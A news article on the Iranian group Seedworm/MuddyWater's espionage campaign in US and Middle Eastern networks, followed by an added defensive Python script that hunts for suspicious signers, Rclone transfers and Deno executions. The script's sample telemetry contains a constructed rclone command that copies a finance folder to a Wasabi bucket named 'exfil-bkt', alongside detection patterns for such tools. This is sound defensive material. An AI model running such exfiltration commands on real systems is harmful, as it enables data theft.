Iranian state-sponsored hackers have maintained persistent access inside multiple US critical infrastructure networks since early February 2026, establishing footholds that security researchers warn could enable devastating attacks amid escalating geopolitical tensions in the Middle East.
MuddyWater Returns with New Malware Arsenal
Symantec and Carbon Black researchers have attributed the activity to Seedworm (also known as MuddyWater), an Iranian advanced persistent threat (APT) group linked to Iran’s Ministry of Intelligence and Security (MOIS). The group has a long history of espionage campaigns targeting government agencies, telecommunications companies, and critical infrastructure worldwide.
The ongoing campaign has compromised networks belonging to:
- A US bank
- A US airport
- Non-profit organizations
- Israeli operations of a US defense and aerospace software company
The attackers have deployed two previously unknown malware families:
Dindoor Backdoor
Named for its use of Deno, a modern JavaScript and TypeScript runtime, Dindoor represents a shift in Seedworm’s tooling toward cross-platform frameworks. The backdoor was digitally signed with a certificate issued to an individual named “Amy Cherne.”
Fakeset Python Backdoor
This Python-based backdoor uses certificates attributed to both “Amy Cherne” and “Donald Gay”; the latter name was previously associated with Seedworm’s Stagecomp and Darkcomp malware. This overlap in signing certificates provides a strong attribution link to the Iranian APT.
Espionage-Focused Operations
The campaign appears focused on intelligence collection rather than disruption. Researchers observed attackers attempting to exfiltrate data from the targeted software company to a Wasabi cloud storage bucket using Rclone, the popular open-source cloud synchronization tool often abused by threat actors for data theft.
“While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on US and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks,” the researchers noted.
Exposed Infrastructure Reveals Broader Campaign
In a related development, independent threat-intel research collective Ctrl-Alt-Intel claimed to have accessed Seedworm’s command-and-control infrastructure hosted in the Netherlands, recovering C2 tooling, scripts, logs, and victim data.
Their analysis revealed additional targets including:
- Israeli healthcare, hosting, immigration, and intelligence organizations
- EgyptAir
- Jordanian government entities
- Various UAE companies
- Additional US entities
- Jewish and Israeli-linked NGOs
The exposed infrastructure demonstrated sophisticated operational tradecraft: “Multiple custom-developed C2 frameworks, exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels spanning cloud storage & EC2 instances.”
Why This Matters
With the conflict between Israel and Iran intensifying, Seedworm’s pre-positioned access in US critical infrastructure represents a significant national security concern. The group’s presence in banking and aviation networks, two sectors where an attack could cause widespread disruption, demonstrates Iran’s strategic cyber preparation for potential escalation.
Organizations in critical infrastructure sectors should immediately:
- Hunt for indicators of compromise associated with Dindoor and Fakeset
- Monitor for unauthorized use of Rclone or similar exfiltration tools
- Review certificate trust chains for suspicious signers
- Implement enhanced monitoring for Deno runtime execution
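The following script is an added example of how a defender might turn the recommendations above (and the Rclone-to-Wasabi exfiltration described earlier) into a first-pass hunt over process-creation telemetry. It is not code from Symantec, Carbon Black, Ctrl-Alt-Intel or Help Net Security. The event shape is a constructed, Sysmon-like dictionary, the sample events are invented, and the signer watchlist contains only the two names reported in the article. Wasabi's S3 endpoint domain (`wasabisys.com`) and Deno's `run`, `-A`/`--allow-all` and `--allow-*` permission flags are real; everything else is a heuristic that will need tuning against your own baseline of legitimate Rclone and Deno use.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Certificate subject names reported on the signed Dindoor/Fakeset samples.
SUSPICIOUS_SIGNERS = {"amy cherne", "donald gay"}

# Hints that an rclone transfer targets an external cloud backend:
# Wasabi's S3 endpoint domain, AWS S3, and rclone's own S3 backend flags.
CLOUD_HINTS = ("wasabisys.com", "amazonaws.com", "--s3-endpoint", "--s3-provider")

RCLONE_VERB_RE = re.compile(r"\b(copyto|moveto|copy|sync|move)\b", re.I)
DENO_RUN_RE = re.compile(r"\brun\b")
DENO_BROAD_PERMS_RE = re.compile(r"(?:^|\s)(-A|--allow-all|--allow-run)(?=\s|$)")
DENO_ANY_PERMS_RE = re.compile(r"(?:^|\s)(-A|--allow-[a-z-]+)(?=\s|$)")
USER_WRITABLE_RE = re.compile(r"[\\/](AppData|Temp|Users|ProgramData|Public)[\\/]", re.I)

# Constructed sample telemetry (not real events) in a Sysmon-like shape.
SAMPLE_EVENTS = [
    {"host": "ws-04", "image": r"C:\Users\j.doe\AppData\Local\Temp\rclone.exe",
     "cmdline": r'rclone.exe copy "C:\Finance\Q1" wasabi:exfil-bkt --s3-endpoint s3.wasabisys.com -q',
     "signer": ""},
    {"host": "ws-04", "image": r"C:\Users\j.doe\.deno\bin\deno.exe",
     "cmdline": r"deno.exe run -A --no-prompt C:\Users\j.doe\AppData\Roaming\upd\main.ts",
     "signer": ""},
    {"host": "srv-12", "image": r"C:\ProgramData\svc\update.exe",
     "cmdline": "update.exe --silent", "signer": "Amy Cherne"},
    {"host": "srv-12", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "signer": "Microsoft Windows"},
    {"host": "build-01", "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone.exe sync D:\backups onprem-nas:/backups", "signer": ""},
]


@dataclass
class Finding:
    host: str
    rule: str
    severity: str
    evidence: str


def basename(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def check_signer(event: dict) -> Optional[Finding]:
    """Flag executables whose Authenticode signer is on the watchlist."""
    signer = event.get("signer", "").strip()
    if signer.lower() not in SUSPICIOUS_SIGNERS:
        return None
    note = " (image in user-writable path)" if USER_WRITABLE_RE.search(event["image"]) else ""
    return Finding(event["host"], "suspicious-signer", "high",
                   f"signed by '{signer}': {event['image']}{note}")


def check_rclone(event: dict) -> Optional[Finding]:
    """Flag rclone transfers; escalate when a cloud backend is visible on the command line."""
    if basename(event["image"]) not in ("rclone.exe", "rclone"):
        return None
    cmd = event["cmdline"]
    if not RCLONE_VERB_RE.search(cmd):
        return None  # e.g. `rclone version`: not a data transfer
    cloud = [h for h in CLOUD_HINTS if h in cmd.lower()]
    severity = "high" if cloud else "medium"
    evidence = f"rclone transfer: {cmd}"
    if cloud:
        evidence += f" (cloud hints: {', '.join(cloud)})"
    return Finding(event["host"], "rclone-transfer", severity, evidence)


def check_deno(event: dict) -> Optional[Finding]:
    """Flag Deno script execution; escalate on broad permission grants and odd locations."""
    if basename(event["image"]) not in ("deno.exe", "deno"):
        return None
    cmd = event["cmdline"]
    if not DENO_RUN_RE.search(cmd):
        return None
    if DENO_BROAD_PERMS_RE.search(cmd):
        severity = "high"       # -A / --allow-all / --allow-run: full host access
    elif DENO_ANY_PERMS_RE.search(cmd):
        severity = "medium"     # some --allow-* grant, review what it reaches
    else:
        severity = "low"        # sandboxed run, still worth a look on a non-dev host
    note = ""
    if USER_WRITABLE_RE.search(cmd) or USER_WRITABLE_RE.search(event["image"]):
        note = " (runtime or script in user-writable path)"
    return Finding(event["host"], "deno-run", severity, f"deno execution: {cmd}{note}")


def analyze_events(events: list) -> list:
    """Run every check over every event and return the findings in event order."""
    findings = []
    for ev in events:
        for check in (check_signer, check_rclone, check_deno):
            finding = check(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f.severity.upper():6}] {f.host:9} {f.rule:18} {f.evidence}")
```

Run as-is it reports four findings from the constructed events: the Rclone copy to a Wasabi endpoint and the Deno `-A` run on `ws-04`, the "Amy Cherne"-signed binary on `srv-12`, and a medium-severity Rclone sync on `build-01` that may well be legitimate backup traffic and is exactly the kind of hit to whitelist once confirmed. To use it on real data, replace `SAMPLE_EVENTS` with process-creation events from your EDR or Sysmon pipeline and feed the findings into your case management rather than `print`.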
Source: Help Net Security
